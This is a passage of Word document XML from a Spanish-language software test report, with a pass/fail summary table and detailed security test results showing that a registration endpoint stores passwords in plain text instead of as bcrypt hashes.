                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-PERF-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-04 (Leaderboard)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-PERF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-06 (Registro masivo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-PERF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-09 (Estrés 500 VUs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-PERF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">65</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9 defectos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultados Detallados por Suite</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:left w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:right w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Módulo / Prueba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pasos (Automatizado)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado Esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado Real</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Estado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-01 — Almacenamiento de contraseña con hash bcrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register</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Backend corriendo.
MongoDB en memoria.
Supertest activo.</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1. Registrar usuario con Pass123!.
2. Verificar body de respuesta HTTP.</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HTTP 201. Body sin campo "password".</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HTTP 201. Body: {"message":"User registered successfully"}. Sin campo password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register
[DEF-SEC-01]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo.
Usuario registrado en BD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Registrar usuario.
2. Consultar User en MongoDB.
3. Verificar formato $2b$ en password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">password en BD con formato bcrypt ($2b$).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">password almacenado como texto plano "Pass123!". No cumple formato $2b$.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register
[DEF-SEC-01]</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Backend corriendo.
Usuario registrado en BD.</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1. Registrar usuario con Pass123!.
2. Leer campo password en MongoDB.
3. Comparar con texto original.</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user.password ≠ "Pass123!" (debe ser hash).</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user.password === "Pass123!". Texto plano almacenado en BD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
